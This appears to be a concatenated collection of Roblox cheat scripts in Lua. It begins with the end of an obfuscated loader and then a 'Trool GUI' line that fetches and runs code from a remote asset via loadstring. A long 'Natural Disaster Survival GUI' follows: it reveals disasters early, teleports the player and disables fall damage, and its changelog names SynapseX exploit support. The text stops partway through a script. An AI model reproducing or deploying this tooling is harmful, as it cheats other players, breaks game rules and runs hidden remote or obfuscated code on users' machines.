r(k(),{},q())(...);end)(({[((#{435;}+500677453))]=(((#{}+587433)));[(675101826)]=((3));[(994647444)]=((4));[.14933920146401003]=(((#{539;[439]=336;[430]=254;716;273;[483]=404;856;}+1)));[((#{504;299;686;}+235166433))]=((194919));[((#{[532]=775;[652]=340;511;[747]=572;593;186;[92]=436;854;}+278790808))]=((479687280));[.5537449384824117]=("\111");[.15456647200256887]=((55852));[(854159444)]=(((#{}+36)));[((#{}+460883687))]=((505665773));eJX0aAqfW0=(((#{644;}+30)));[(810312616)]=((323569581));[.9596475092506257]=((720860));[(836338542)]=((2047));[(323569581)]=("\104");[(217967049)]=((526443));[((#{304;79;[946]=744;491;}+947786472))]=("\112");[(468091470)]=((545533148));qshCk=("\102");[.21539482018695902]=("\119");[((#{[721]=872;821;}+545533147))]=("\98");["h1ngR0R7J"]=((899536904));[((#{79;688;[522]=223;110;[952]=705;[641]=763;[441]=289;264;}+220087738))]=(((#{26;569;240;967;}+228979312)));[.8734795008196866]=((696004271));[((#{[431]=228;566;484;644;256;}+579983893))]=(((#{76;252;678;660;}+86)));[(949810097)]=((894679));[(913092391)]=((1023));[(78242104)]=((709477617));[(228979316)]=("\118");[(960397686)]=((649437957));[(912968923)]=((27));[(461996925)]=("\109");[(335661088)]=((34));[((#{535;952;}+677925953))]=((57));[((#{330;586;[874]=734;571;460;}+869568043))]=("\120");[(479687280)]=("\110");[.4618643994731197]=((21));[(306312066)]=((2));[(565464543)]=("\121");[(531902987)]=((32));[.2943290375612346]=((17));[.9166698758102347]=("\101");[.6624076159961557]=((71));[(649437957)]=("\105");[(467903410)]=("\100");[(583702902)]=((5000));[(709477617)]=("\115");[.12526960024855546]=((20));[((#{}+633273814))]=((330618173));[((#{253;85;963;}+899536901))]=("\114");[(304434994)]=((16777216));[(330618173)]=("\116");[((#{806;}+444002648))]=(((#{959;475;}+565464541)));[((#{[892]=916;868;[418]=169;[945]=998;828;955;504;}+322046183))]=("\97");[(597633957)]=((1));[.8463812427811237]=("\107");["qabx8"]=((6));[(656917394)]=((360846));["HlIyTCQO7M"]=((165));[((#{[353]=813;[99]=197;885;476;[76]=533;583;}+505665770))]=("\108");[(434671730)]=((256));XRmOE=((52));[((#{}+954072929))]=((65536));[(566866416)]=((248));['erbeEao']=(((#{[516]=272;674;408;133;}+461996922)));d0XAT=("\117");["ygR0hP0M"]=((322046187));PE10Ck0RQ0=(((#{793;710;}+869568045)));FmhgTColU=((947786475));[(337442574)]=((13));[(696004271)]=("\99");[(97469237)]=(((#{}+467903410)));["M4vqsm"]=(((#{217;}-1)));[.8991696228735008]=("\35");[(174493961)]=((8));}),...); 2 | -------------------------------------------------------------------------------- /Trool GUI: -------------------------------------------------------------------------------- 1 | loadstring(game:GetObjects("rbxassetid://1683559539")[1].Source)() 2 | -------------------------------------------------------------------------------- /natural disaster survival: -------------------------------------------------------------------------------- 1 | --Converted with ttyyuu12345's model to script plugin v4 2 | function sandbox(var,func) 3 | local env = getfenv(func) 4 | local newenv = setmetatable({},{ 5 | __index = function(self,k) 6 | if k=="script" then 7 | return var 8 | else 9 | return env[k] 10 | end 11 | end, 12 | }) 13 | setfenv(func,newenv) 14 | return func 15 | end 16 | cors = {} 17 | mas = Instance.new("Model",game:GetService("Lighting")) 18 | ScreenGui0 = Instance.new("ScreenGui") 19 | Frame1 = Instance.new("Frame") 20 | TextLabel2 = Instance.new("TextLabel") 21 | TextButton3 = Instance.new("TextButton") 22 | LocalScript4 = Instance.new("LocalScript") 23 | TextLabel5 = Instance.new("TextLabel") 24 | LocalScript6 = Instance.new("LocalScript") 25 | TextLabel7 = Instance.new("TextLabel") 26 | LocalScript8 = Instance.new("LocalScript") 27 | TextButton9 = Instance.new("TextButton") 28 | LocalScript10 = Instance.new("LocalScript") 29 | TextLabel11 = Instance.new("TextLabel") 30 | TextLabel12 = Instance.new("TextLabel") 31 | TextButton13 = Instance.new("TextButton") 32 | LocalScript14 = Instance.new("LocalScript") 33 | TextLabel15 = Instance.new("TextLabel") 34 | TextButton16 = Instance.new("TextButton") 35 | LocalScript17 = Instance.new("LocalScript") 36 | Folder18 = Instance.new("Folder") 37 | Sound19 = Instance.new("Sound") 38 | Sound20 = Instance.new("Sound") 39 | Sound21 = Instance.new("Sound") 40 | Sound22 = Instance.new("Sound") 41 | Sound23 = Instance.new("Sound") 42 | BoolValue24 = Instance.new("BoolValue") 43 | LocalScript25 = Instance.new("LocalScript") 44 | Folder26 = Instance.new("Folder") 45 | Color3Value27 = Instance.new("Color3Value") 46 | Color3Value28 = Instance.new("Color3Value") 47 | Color3Value29 = Instance.new("Color3Value") 48 | Color3Value30 = Instance.new("Color3Value") 49 | Color3Value31 = Instance.new("Color3Value") 50 | TextButton32 = Instance.new("TextButton") 51 | LocalScript33 = Instance.new("LocalScript") 52 | Frame34 = Instance.new("Frame") 53 | TextButton35 = Instance.new("TextButton") 54 | LocalScript36 = Instance.new("LocalScript") 55 | ImageLabel37 = Instance.new("ImageLabel") 56 | ImageLabel38 = Instance.new("ImageLabel") 57 | TextButton39 = Instance.new("TextButton") 58 | LocalScript40 = Instance.new("LocalScript") 59 | Folder41 = Instance.new("Folder") 60 | Frame42 = Instance.new("Frame") 61 | TextButton43 = Instance.new("TextButton") 62 | LocalScript44 = Instance.new("LocalScript") 63 | LocalScript45 = Instance.new("LocalScript") 64 | ImageLabel46 = Instance.new("ImageLabel") 65 | Frame47 = Instance.new("Frame") 66 | Frame48 = Instance.new("Frame") 67 | TextLabel49 = Instance.new("TextLabel") 68 | LocalScript50 = Instance.new("LocalScript") 69 | Folder51 = Instance.new("Folder") 70 | Color3Value52 = Instance.new("Color3Value") 71 | Color3Value53 = Instance.new("Color3Value") 72 | Color3Value54 = Instance.new("Color3Value") 73 | Color3Value55 = Instance.new("Color3Value") 74 | Color3Value56 = Instance.new("Color3Value") 75 | BoolValue57 = Instance.new("BoolValue") 76 | StringValue58 = Instance.new("StringValue") 77 | BoolValue59 = Instance.new("BoolValue") 78 | Script60 = Instance.new("Script") 79 | ScreenGui0.Name = "NDSui" 80 | ScreenGui0.Parent = mas 81 | ScreenGui0.ResetOnSpawn = false 82 | Frame1.Name = "Panel" 83 | Frame1.Parent = ScreenGui0 84 | Frame1.Position = UDim2.new(0.402971774, 0, 0.298489451, 0) 85 | Frame1.Visible = false 86 | Frame1.Size = UDim2.new(0, 390, 0, 230) 87 | Frame1.Active = true 88 | Frame1.BackgroundColor = BrickColor.new("Black") 89 | Frame1.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) 90 | Frame1.BorderSizePixel = 0 91 | Frame1.Draggable = true 92 | TextLabel2.Name = "Title" 93 | TextLabel2.Parent = Frame1 94 | TextLabel2.Position = UDim2.new(0, 5, 0, 0) 95 | TextLabel2.Size = UDim2.new(0, 355, 0, 25) 96 | TextLabel2.Active = true 97 | TextLabel2.BackgroundColor = BrickColor.new("Institutional white") 98 | TextLabel2.BackgroundColor3 = Color3.new(1, 1, 1) 99 | TextLabel2.BackgroundTransparency = 1 100 | TextLabel2.BorderSizePixel = 0 101 | TextLabel2.Font = Enum.Font.Highway 102 | TextLabel2.FontSize = Enum.FontSize.Size14 103 | TextLabel2.Text = "Natural Disaster Survival GUI" 104 | TextLabel2.TextColor = BrickColor.new("Institutional white") 105 | TextLabel2.TextColor3 = Color3.new(1, 1, 1) 106 | TextLabel2.TextSize = 14 107 | TextLabel2.TextXAlignment = Enum.TextXAlignment.Left 108 | TextButton3.Name = "VoteSys" 109 | TextButton3.Parent = Frame1 110 | TextButton3.Position = UDim2.new(0, 5, 0, 35) 111 | TextButton3.Size = UDim2.new(0, 175, 0, 40) 112 | TextButton3.BackgroundColor = BrickColor.new("Dark taupe") 113 | TextButton3.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 114 | TextButton3.BorderSizePixel = 0 115 | TextButton3.Font = Enum.Font.SourceSans 116 | TextButton3.FontSize = Enum.FontSize.Size14 117 | TextButton3.Text = "Open Vote Menu" 118 | TextButton3.TextColor = BrickColor.new("Institutional white") 119 | TextButton3.TextColor3 = Color3.new(1, 1, 1) 120 | TextButton3.TextSize = 14 121 | LocalScript4.Parent = TextButton3 122 | table.insert(cors,sandbox(LocalScript4,function() 123 | local Button = script.Parent 124 | votemenu = game.Players.LocalPlayer.PlayerGui.MainGui.MapVotePage 125 | 126 | function onClick() 127 | script.Parent.Parent.Sounds.Click:Play() 128 | if votemenu.Visible==true then 129 | script.Parent.Text = "Open Vote Menu" 130 | votemenu.Visible=false 131 | elseif votemenu.Visible==false then 132 | script.Parent.Text = "Close Vote Menu" 133 | votemenu.Visible=true 134 | end 135 | end 136 | 137 | Button.MouseButton1Click:connect(onClick) 138 | 139 | end)) 140 | TextLabel5.Name = "DisDSP" 141 | TextLabel5.Parent = Frame1 142 | TextLabel5.Position = UDim2.new(0, 190, 0, 35) 143 | TextLabel5.Size = UDim2.new(0, 195, 0, 40) 144 | TextLabel5.BackgroundColor = BrickColor.new("Dark taupe") 145 | TextLabel5.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 146 | TextLabel5.BorderSizePixel = 0 147 | TextLabel5.Font = Enum.Font.SourceSans 148 | TextLabel5.FontSize = Enum.FontSize.Size14 149 | TextLabel5.Text = "---" 150 | TextLabel5.TextColor = BrickColor.new("Really red") 151 | TextLabel5.TextColor3 = Color3.new(0.870588, 0, 0) 152 | TextLabel5.TextSize = 14 153 | LocalScript6.Parent = TextLabel5 154 | table.insert(cors,sandbox(LocalScript6,function() 155 | --Init 156 | print("Starting Detection Core...") 157 | 158 | --Pointers 159 | sounds = script.Parent.Parent.Sounds 160 | colors = script.Parent.Parent.Colors 161 | plyrname = game.Players.LocalPlayer.Name 162 | 163 | -------------------------------------------- 164 | --Logic 165 | script.Parent.TextColor3 = colors.Red.Value 166 | script.Parent.Text = "Initializing UI Core..." 167 | wait(3) 168 | if game.Players.LocalPlayer.Character:FindFirstChild("SurvivalTag") ~= nil then 169 | script.Parent.Text = (game.Workspace[plyrname].SurvivalTag.Value) 170 | script.Parent.TextColor3 = colors.Green.Value 171 | sounds.Confirm:Play() 172 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = ("The current disaster is a " ..game.Workspace[plyrname].SurvivalTag.Value .."!") 173 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 174 | else 175 | sounds.Processing:Play() 176 | script.Parent.Text = "Waiting for tags..." 177 | script.Parent.TextColor3 = colors.Yellow.Value 178 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = "Waiting for tags..." 179 | script.Parent.Parent.Parent.AlertPnl.Mode.Value = true 180 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 181 | game.Players.LocalPlayer.Character:WaitForChild("SurvivalTag", 5) 182 | if game.Players.LocalPlayer.Character:FindFirstChild("SurvivalTag") ~= nil then 183 | script.Parent.Text = (game.Workspace[plyrname].SurvivalTag.Value) 184 | script.Parent.TextColor3 = colors.Green.Value 185 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = ("The current disaster is a " ..game.Workspace[plyrname].SurvivalTag.Value .."!") 186 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 187 | sounds.Confirm:Play() 188 | else 189 | script.Parent.Text = "Waiting for T2 detection..." 190 | end 191 | end 192 | 193 | game.Players.LocalPlayer.Character.ChildAdded:Connect(function(object) 194 | if object:IsA("StringValue") then 195 | if game.Workspace:FindFirstChild(plyrname) ~= nil then 196 | if game.Players.LocalPlayer.Character:FindFirstChild("SurvivalTag") ~= nil then 197 | script.Parent.Text = (game.Workspace[plyrname].SurvivalTag.Value) 198 | script.Parent.TextColor3 = colors.Green.Value 199 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = ("The current disaster is a " ..game.Workspace[plyrname].SurvivalTag.Value .."!") 200 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 201 | sounds.Confirm:Play() 202 | else 203 | sounds.Processing:Play() 204 | script.Parent.Text = "Waiting for tags..." 205 | script.Parent.TextColor3 = colors.Yellow.Value 206 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = "Waiting for tags..." 207 | script.Parent.Parent.Parent.AlertPnl.Mode.Value = true 208 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 209 | game.Players.LocalPlayer.Character:WaitForChild("SurvivalTag") 210 | wait(.5) 211 | script.Parent.Text = (game.Workspace[plyrname].SurvivalTag.Value) 212 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = ("The current disaster is a " ..game.Workspace[plyrname].SurvivalTag.Value .."!") 213 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 214 | script.Parent.TextColor3 = colors.Green.Value 215 | sounds.Confirm:Play() 216 | end 217 | else 218 | script.Parent.Text = "Waiting for T2 detection..." 219 | end 220 | else 221 | end 222 | end) 223 | 224 | game.Players.LocalPlayer.CharacterAdded:connect(function() 225 | script.Parent.TextColor3 = colors.Red.Value 226 | script.Parent.Text = "Initializing UI Core..." 227 | wait(3) 228 | if game.Players.LocalPlayer.Character:FindFirstChild("SurvivalTag") ~= nil then 229 | script.Parent.Text = (game.Workspace[plyrname].SurvivalTag.Value) 230 | script.Parent.TextColor3 = colors.Green.Value 231 | sounds.Confirm:Play() 232 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = ("The current disaster is a " ..game.Workspace[plyrname].SurvivalTag.Value .."!") 233 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 234 | else 235 | sounds.Processing:Play() 236 | script.Parent.Text = "Waiting for tags..." 237 | script.Parent.TextColor3 = colors.Yellow.Value 238 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = "Waiting for tags..." 239 | script.Parent.Parent.Parent.AlertPnl.Mode.Value = true 240 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 241 | game.Players.LocalPlayer.Character:WaitForChild("SurvivalTag") 242 | if game.Players.LocalPlayer.Character:FindFirstChild("SurvivalTag") ~= nil then 243 | script.Parent.Text = (game.Workspace[plyrname].SurvivalTag.Value) 244 | script.Parent.TextColor3 = colors.Green.Value 245 | script.Parent.Parent.Parent.AlertPnl.InputText.Value = ("The current disaster is a " ..game.Workspace[plyrname].SurvivalTag.Value .."!") 246 | script.Parent.Parent.Parent.AlertPnl.Activate.Value = true 247 | sounds.Confirm:Play() 248 | else 249 | script.Parent.Text = "Waiting for T2 detection..." 250 | end 251 | end 252 | end) 253 | end)) 254 | TextLabel7.Name = "ToolTip" 255 | TextLabel7.Parent = TextLabel5 256 | TextLabel7.Visible = false 257 | TextLabel7.Size = UDim2.new(0, 195, 0, 40) 258 | TextLabel7.BackgroundColor = BrickColor.new("Parsley green") 259 | TextLabel7.BackgroundColor3 = Color3.new(0, 0.333333, 0) 260 | TextLabel7.BorderSizePixel = 0 261 | TextLabel7.ZIndex = 2 262 | TextLabel7.Font = Enum.Font.SourceSans 263 | TextLabel7.FontSize = Enum.FontSize.Size14 264 | TextLabel7.Text = "This panel is automated to show you the current disaster as soon as it's tag becomes available." 265 | TextLabel7.TextColor = BrickColor.new("Institutional white") 266 | TextLabel7.TextColor3 = Color3.new(1, 1, 1) 267 | TextLabel7.TextScaled = true 268 | TextLabel7.TextSize = 14 269 | TextLabel7.TextWrap = true 270 | TextLabel7.TextWrapped = true 271 | LocalScript8.Name = "Tooltip" 272 | LocalScript8.Parent = TextLabel5 273 | table.insert(cors,sandbox(LocalScript8,function() 274 | script.Parent.MouseEnter:Connect(function() 275 | script.Parent.ToolTip.Visible = true 276 | end) 277 | 278 | script.Parent.MouseLeave:Connect(function() 279 | script.Parent.ToolTip.Visible = false 280 | end) 281 | 282 | 283 | end)) 284 | TextButton9.Name = "ClsBttn" 285 | TextButton9.Parent = Frame1 286 | TextButton9.Position = UDim2.new(0, 365, 0, 5) 287 | TextButton9.Size = UDim2.new(0, 20, 0, 15) 288 | TextButton9.BackgroundColor = BrickColor.new("Really red") 289 | TextButton9.BackgroundColor3 = Color3.new(1, 0, 0) 290 | TextButton9.BackgroundTransparency = 0.15000000596046 291 | TextButton9.BorderSizePixel = 0 292 | TextButton9.Font = Enum.Font.SourceSans 293 | TextButton9.FontSize = Enum.FontSize.Size14 294 | TextButton9.Text = "" 295 | TextButton9.TextSize = 14 296 | LocalScript10.Parent = TextButton9 297 | table.insert(cors,sandbox(LocalScript10,function() 298 | local Button = script.Parent 299 | Frame = script.Parent.Parent 300 | 301 | function onClick() 302 | script.Parent.Parent.Sounds.Cancel:Play() 303 | if Frame.Visible == false then 304 | Frame.Visible = true 305 | elseif Frame.Visible == true then 306 | Frame.Visible = false 307 | end 308 | end 309 | 310 | Button.MouseButton1Click:connect(onClick) 311 | 312 | end)) 313 | TextLabel11.Name = "Info" 314 | TextLabel11.Parent = Frame1 315 | TextLabel11.Position = UDim2.new(0, 5, 0, 210) 316 | TextLabel11.Size = UDim2.new(0, 380, 0, 15) 317 | TextLabel11.Active = true 318 | TextLabel11.BackgroundColor = BrickColor.new("Institutional white") 319 | TextLabel11.BackgroundColor3 = Color3.new(1, 1, 1) 320 | TextLabel11.BackgroundTransparency = 1 321 | TextLabel11.BorderSizePixel = 0 322 | TextLabel11.Font = Enum.Font.Code 323 | TextLabel11.FontSize = Enum.FontSize.Size11 324 | TextLabel11.Text = "We made it to 1.0 bois!!! WOOHOOO!!!" 325 | TextLabel11.TextColor = BrickColor.new("Institutional white") 326 | TextLabel11.TextColor3 = Color3.new(1, 1, 1) 327 | TextLabel11.TextSize = 11 328 | TextLabel11.TextXAlignment = Enum.TextXAlignment.Left 329 | TextLabel12.Name = "Ver" 330 | TextLabel12.Parent = Frame1 331 | TextLabel12.Position = UDim2.new(0, 315, 0, 5) 332 | TextLabel12.Size = UDim2.new(0, 35, 0, 15) 333 | TextLabel12.Active = true 334 | TextLabel12.BackgroundColor = BrickColor.new("Dark taupe") 335 | TextLabel12.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 336 | TextLabel12.BackgroundTransparency = 1 337 | TextLabel12.BorderSizePixel = 0 338 | TextLabel12.Font = Enum.Font.Code 339 | TextLabel12.FontSize = Enum.FontSize.Size14 340 | TextLabel12.Text = "v.1.1a" 341 | TextLabel12.TextColor = BrickColor.new("Silver flip/flop") 342 | TextLabel12.TextColor3 = Color3.new(0.54902, 0.54902, 0.54902) 343 | TextLabel12.TextSize = 14 344 | TextLabel12.TextXAlignment = Enum.TextXAlignment.Right 345 | TextButton13.Name = "InfBtn" 346 | TextButton13.Parent = Frame1 347 | TextButton13.Position = UDim2.new(0, 365, 0, 210) 348 | TextButton13.Size = UDim2.new(0, 20, 0, 15) 349 | TextButton13.BackgroundColor = BrickColor.new("Quill grey") 350 | TextButton13.BackgroundColor3 = Color3.new(0.866667, 0.866667, 0.866667) 351 | TextButton13.BackgroundTransparency = 0.5 352 | TextButton13.BorderSizePixel = 0 353 | TextButton13.Font = Enum.Font.SourceSans 354 | TextButton13.FontSize = Enum.FontSize.Size14 355 | TextButton13.Text = "?" 356 | TextButton13.TextSize = 14 357 | LocalScript14.Parent = TextButton13 358 | table.insert(cors,sandbox(LocalScript14,function() 359 | local Button = script.Parent 360 | Frame = script.Parent.Parent.Changelog 361 | 362 | function onClick() 363 | script.Parent.Parent.Sounds.Click:Play() 364 | if Frame.Visible == false then 365 | Frame.Visible = true 366 | elseif Frame.Visible == true then 367 | Frame.Visible = false 368 | end 369 | end 370 | 371 | Button.MouseButton1Click:connect(onClick) 372 | 373 | end)) 374 | TextLabel15.Name = "Changelog" 375 | TextLabel15.Parent = Frame1 376 | TextLabel15.Position = UDim2.new(0, 390, 0, 80) 377 | TextLabel15.Visible = false 378 | TextLabel15.Size = UDim2.new(0, 200, 0, 150) 379 | TextLabel15.BackgroundColor = BrickColor.new("Black") 380 | TextLabel15.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) 381 | TextLabel15.BorderSizePixel = 0 382 | TextLabel15.Font = Enum.Font.SourceSans 383 | TextLabel15.FontSize = Enum.FontSize.Size14 384 | TextLabel15.Text = "V.1.1a corrects a minor typo in the notification system as well as adds support for SynapseX and other exploits as well as adding a button to toggle fall damage." 385 | TextLabel15.TextColor = BrickColor.new("Institutional white") 386 | TextLabel15.TextColor3 = Color3.new(1, 1, 1) 387 | TextLabel15.TextSize = 14 388 | TextLabel15.TextWrap = true 389 | TextLabel15.TextWrapped = true 390 | TextLabel15.TextXAlignment = Enum.TextXAlignment.Left 391 | TextLabel15.TextYAlignment = Enum.TextYAlignment.Top 392 | TextButton16.Name = "Tele" 393 | TextButton16.Parent = Frame1 394 | TextButton16.Position = UDim2.new(0, 5, 0, 85) 395 | TextButton16.Size = UDim2.new(0, 175, 0, 40) 396 | TextButton16.BackgroundColor = BrickColor.new("Dark taupe") 397 | TextButton16.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 398 | TextButton16.BorderSizePixel = 0 399 | TextButton16.Font = Enum.Font.SourceSans 400 | TextButton16.FontSize = Enum.FontSize.Size14 401 | TextButton16.Text = "Return To Spawn" 402 | TextButton16.TextColor = BrickColor.new("Institutional white") 403 | TextButton16.TextColor3 = Color3.new(1, 1, 1) 404 | TextButton16.TextSize = 14 405 | LocalScript17.Parent = TextButton16 406 | table.insert(cors,sandbox(LocalScript17,function() 407 | local Button = script.Parent 408 | 409 | function onClick() 410 | script.Parent.Parent.Sounds.Click:Play() 411 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-260.226776, 193.849884, 318.382538) + Vector3.new(1,0,0) 412 | end 413 | 414 | Button.MouseButton1Click:connect(onClick) 415 | 416 | end)) 417 | Folder18.Name = "Sounds" 418 | Folder18.Parent = Frame1 419 | Sound19.Name = "Processing" 420 | Sound19.Parent = Folder18 421 | Sound19.SoundId = "rbxassetid://2102111973" 422 | Sound19.Volume = 1 423 | Sound20.Name = "Cancel" 424 | Sound20.Parent = Folder18 425 | Sound20.SoundId = "rbxassetid://2102119175" 426 | Sound20.Volume = 1 427 | Sound21.Name = "Confirm" 428 | Sound21.Parent = Folder18 429 | Sound21.SoundId = "rbxassetid://2102108868" 430 | Sound21.Volume = 1 431 | Sound22.Name = "Click" 432 | Sound22.Parent = Folder18 433 | Sound22.SoundId = "rbxassetid://318763788" 434 | Sound22.Volume = 1 435 | Sound23.Name = "bass" 436 | Sound23.Parent = Folder18 437 | Sound23.SoundId = "rbxassetid://387927244" 438 | Sound23.Volume = 1 439 | BoolValue24.Name = "Mute" 440 | BoolValue24.Parent = Folder18 441 | LocalScript25.Name = "Manager" 442 | LocalScript25.Parent = Folder18 443 | table.insert(cors,sandbox(LocalScript25,function() 444 | script.Parent.Mute.Changed:Connect(function() 445 | if script.Parent.Mute.Value == true then 446 | for i, v in pairs(script.Parent:GetChildren()) do 447 | if v.ClassName == "Sound" then 448 | v.Volume = 0 449 | end 450 | print("NDSui Sound Muted") 451 | end 452 | else 453 | for i, v in pairs(script.Parent:GetChildren()) do 454 | if v.ClassName == "Sound" then 455 | v.Volume = 1 456 | end 457 | print("NDSui Sound Un-Muted") 458 | end 459 | end 460 | end) 461 | end)) 462 | Folder26.Name = "Colors" 463 | Folder26.Parent = Frame1 464 | Color3Value27.Name = "Red" 465 | Color3Value27.Parent = Folder26 466 | Color3Value27.Value = Color3.new(1, 0, 0) 467 | Color3Value28.Name = "Green" 468 | Color3Value28.Parent = Folder26 469 | Color3Value28.Value = Color3.new(0.203922, 0.784314, 0.160784) 470 | Color3Value29.Name = "Yellow" 471 | Color3Value29.Parent = Folder26 472 | Color3Value29.Value = Color3.new(0.956863, 0.87451, 0.258824) 473 | Color3Value30.Name = "White" 474 | Color3Value30.Parent = Folder26 475 | Color3Value30.Value = Color3.new(1, 1, 1) 476 | Color3Value31.Name = "Black" 477 | Color3Value31.Parent = Folder26 478 | Color3Value31.Value = Color3.new(0.105882, 0.164706, 0.207843) 479 | TextButton32.Name = "Dab" 480 | TextButton32.Parent = Frame1 481 | TextButton32.Position = UDim2.new(0, 190, 0, 85) 482 | TextButton32.Size = UDim2.new(0, 195, 0, 40) 483 | TextButton32.BackgroundColor = BrickColor.new("Dark taupe") 484 | TextButton32.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 485 | TextButton32.BorderSizePixel = 0 486 | TextButton32.Font = Enum.Font.SourceSans 487 | TextButton32.FontSize = Enum.FontSize.Size14 488 | TextButton32.Text = "Dab on the haters..." 489 | TextButton32.TextColor = BrickColor.new("Institutional white") 490 | TextButton32.TextColor3 = Color3.new(1, 1, 1) 491 | TextButton32.TextSize = 14 492 | LocalScript33.Parent = TextButton32 493 | table.insert(cors,sandbox(LocalScript33,function() 494 | local Button = script.Parent 495 | 496 | function onClick() 497 | script.Disabled = true 498 | ub = Instance.new("BlurEffect") 499 | ub.Parent = game.Lighting 500 | ub.Name = "UIblur" 501 | ub.Size = 20 502 | script.Parent.Parent.Sounds.bass:Play() 503 | AnimationId = "248263260" 504 | local Anim = Instance.new("Animation") 505 | Anim.AnimationId = "rbxassetid://"..AnimationId 506 | local k = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 507 | k:Play() 508 | k:AdjustSpeed(1) 509 | 510 | script.Parent.Text = "Dabbing, reset to stop." 511 | script.Parent.TextColor3 = script.Parent.Parent.Colors.Red.Value 512 | for i = 1,20 do 513 | ub.Size = ub.Size -1 514 | wait(.05) 515 | end 516 | for i, v in pairs(game.Lighting:GetChildren()) do 517 | if v.Name == "UIblur" then 518 | v:Destroy() 519 | end 520 | end 521 | script.Disabled = false 522 | end 523 | 524 | game.Players.LocalPlayer.CharacterAdded:connect(function() 525 | script.Parent.Text = "Dab on the haters..." 526 | script.Parent.TextColor3 = script.Parent.Parent.Colors.White.Value 527 | end) 528 | Button.MouseButton1Click:connect(onClick) 529 | end)) 530 | Frame34.Name = "SBar" 531 | Frame34.Parent = Frame1 532 | Frame34.Position = UDim2.new(0, 0, 0, 25) 533 | Frame34.Size = UDim2.new(1, 0, 0, 5) 534 | Frame34.BackgroundColor = BrickColor.new("Silver flip/flop") 535 | Frame34.BackgroundColor3 = Color3.new(0.54902, 0.54902, 0.54902) 536 | Frame34.BorderSizePixel = 0 537 | TextButton35.Name = "MuteBtn" 538 | TextButton35.Parent = Frame1 539 | TextButton35.Position = UDim2.new(0, 335, 0, 210) 540 | TextButton35.Size = UDim2.new(0, 20, 0, 15) 541 | TextButton35.BackgroundColor = BrickColor.new("Quill grey") 542 | TextButton35.BackgroundColor3 = Color3.new(0.866667, 0.866667, 0.866667) 543 | TextButton35.BackgroundTransparency = 0.5 544 | TextButton35.BorderSizePixel = 0 545 | TextButton35.Font = Enum.Font.SourceSans 546 | TextButton35.FontSize = Enum.FontSize.Size14 547 | TextButton35.Text = " " 548 | TextButton35.TextSize = 14 549 | LocalScript36.Parent = TextButton35 550 | table.insert(cors,sandbox(LocalScript36,function() 551 | local Button = script.Parent 552 | mutetogg = script.Parent.Parent.Sounds.Mute 553 | 554 | function onClick() 555 | script.Parent.Parent.Sounds.Click:Play() 556 | if mutetogg.Value == false then 557 | mutetogg.Value = true 558 | script.Parent.Audio.Visible = false 559 | script.Parent.NoAudio.Visible = true 560 | else 561 | mutetogg.Value = false 562 | script.Parent.Audio.Visible = true 563 | script.Parent.NoAudio.Visible = false 564 | end 565 | 566 | end 567 | 568 | Button.MouseButton1Click:connect(onClick) 569 | 570 | end)) 571 | ImageLabel37.Name = "Audio" 572 | ImageLabel37.Parent = TextButton35 573 | ImageLabel37.Size = UDim2.new(1, 0, 1, 0) 574 | ImageLabel37.BackgroundColor = BrickColor.new("Institutional white") 575 | ImageLabel37.BackgroundColor3 = Color3.new(1, 1, 1) 576 | ImageLabel37.BackgroundTransparency = 1 577 | ImageLabel37.Image = "rbxassetid://2585360562" 578 | ImageLabel37.ImageColor3 = Color3.new(0.196078, 0.196078, 0.196078) 579 | ImageLabel37.ScaleType = Enum.ScaleType.Fit 580 | ImageLabel38.Name = "NoAudio" 581 | ImageLabel38.Parent = TextButton35 582 | ImageLabel38.Visible = false 583 | ImageLabel38.Size = UDim2.new(1, 0, 1, 0) 584 | ImageLabel38.BackgroundColor = BrickColor.new("Crimson") 585 | ImageLabel38.BackgroundColor3 = Color3.new(0.666667, 0, 0) 586 | ImageLabel38.BackgroundTransparency = 0.80000001192093 587 | ImageLabel38.Image = "rbxassetid://2585365820" 588 | ImageLabel38.ImageColor3 = Color3.new(0.196078, 0.196078, 0.196078) 589 | ImageLabel38.ScaleType = Enum.ScaleType.Fit 590 | TextButton39.Name = "FllDmg" 591 | TextButton39.Parent = Frame1 592 | TextButton39.Position = UDim2.new(0, 5, 0, 135) 593 | TextButton39.Size = UDim2.new(0, 175, 0, 40) 594 | TextButton39.BackgroundColor = BrickColor.new("Dark taupe") 595 | TextButton39.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 596 | TextButton39.BorderSizePixel = 0 597 | TextButton39.Font = Enum.Font.SourceSans 598 | TextButton39.FontSize = Enum.FontSize.Size14 599 | TextButton39.Text = "Disable Fall Damage" 600 | TextButton39.TextColor = BrickColor.new("Institutional white") 601 | TextButton39.TextColor3 = Color3.new(1, 1, 1) 602 | TextButton39.TextSize = 14 603 | LocalScript40.Parent = TextButton39 604 | table.insert(cors,sandbox(LocalScript40,function() 605 | --Pointers 606 | local Button = script.Parent 607 | colors = script.Parent.Parent.Colors 608 | sounds = script.Parent.Parent.Sounds 609 | 610 | --Vars 611 | local actv = false 612 | 613 | --Logic 614 | function onClick() 615 | sounds.Click:Play() 616 | if actv == false then 617 | script.Parent.Text = "Fall Damage Disabled" 618 | script.Parent.TextColor3 = colors.Green.Value 619 | script.Parent.LghtBr.BackgroundColor3 = colors.Green.Value 620 | actv = true 